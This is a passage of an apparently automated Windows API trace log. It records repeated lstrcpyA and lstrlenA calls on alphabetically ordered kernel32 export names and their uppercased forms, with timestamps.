(lpString="BACKUPWRITE") returned 11 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.750] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.750] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.750] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.750] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.750] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.750] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.750] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.750] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.750] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.750] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.751] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.751] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.751] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.751] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.751] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.751] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.751] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.751] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.751] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.751] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.751] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.751] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.751] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.751] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.751] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.751] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.751] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.751] lstrlenA (lpString="BEEP") returned 4 [0080.751] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.752] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.752] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.752] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.752] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.752] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.752] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.752] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.752] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.752] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.752] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.752] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.752] lstrlenA (lpString="CANCELIO") returned 8 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.752] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.752] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.752] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.752] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.752] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.752] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.752] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.753] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.753] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.753] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.753] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.753] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.753] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.753] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.753] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.753] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.753] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.753] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.753] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.753] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.753] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.753] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.753] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.753] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.753] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.753] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.754] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.754] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.754] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.754] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.754] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.754] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.754] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.754] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.754] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.754] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.754] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.754] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.754] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.754] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.754] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.754] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.754] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.754] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.754] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.755] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.755] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.755] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.755] lstrlenA (lpString="COPYFILEA") returned 9 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.755] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.755] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.755] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.755] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.755] lstrlenA (lpString="COPYFILEW") returned 9 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.755] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.755] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.755] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.755] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.755] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.755] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.755] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.755] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.755] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.755] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.756] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.756] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.756] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.756] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.756] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.756] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.756] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.756] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.756] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.756] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.756] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.756] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.756] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.756] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.756] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.756] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.756] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.756] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.756] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.757] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.757] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.757] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.757] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.757] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.757] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.757] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotA" | out: 